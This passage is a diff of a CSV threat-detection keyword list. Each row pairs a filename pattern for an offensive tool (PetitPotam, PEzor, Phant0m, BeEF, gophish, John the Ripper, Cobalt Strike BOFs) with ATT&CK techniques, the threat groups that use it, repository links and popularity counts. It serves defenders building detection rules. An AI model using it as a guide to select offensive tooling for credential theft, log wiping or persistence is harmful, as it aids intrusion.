APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-time.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-xll.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*PersStartup.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PEScrambler.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*PetitPotam.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*PetitPotam.cpp*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.cpp*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*PetitPotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.ps1*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*petitpotam.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*petitpotam.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*petitpotam.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PetitPotam.py*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.py*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.sln*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*PetitPotam.sln*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.sln*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" "*PetitPotam.vcxproj*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*petitpotam_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*petitpotam_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*PetitPotamModified.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*PEzor generated Beacon Object File*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*PEzor*/Inject.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" @@ -14722,11 +14888,11 @@ "*PEzor.sh *.bin*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*PEzor/*/bof.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*PEzor/*syscalls.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*pfsense*reverse_root_shell_csrf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*pfx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pgpdisk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pgpsda2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pgpwde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pfsense*reverse_root_shell_csrf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*pfx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpdisk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpsda2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpwde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Phant0m scm 1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m scm 2*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m wmi*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" @@ -14736,33 +14902,33 @@ "*Phant0m-master.zip*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phant0m-rdll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phantom_thread * shc *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*PhantomService.csproj*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*PhantomService.exe*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*phish_test.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*phish_windows_credentials.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*PhantomService.csproj*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*PhantomService.exe*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*phish_test.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*phish_windows_credentials.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Phish-Creds.ps1*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*phishery*","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1210 - T1565 - T1564.001","TA0002 - TA0007 - TA0010","N/A","N/A","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","10","947","208","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z" "*phishing-HTML-linter.*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" -"*phishlets *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*phising_attack.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*phishlets *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*phising_attack.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*phoneinfoga scan -n *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PhoneInfoga*","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information 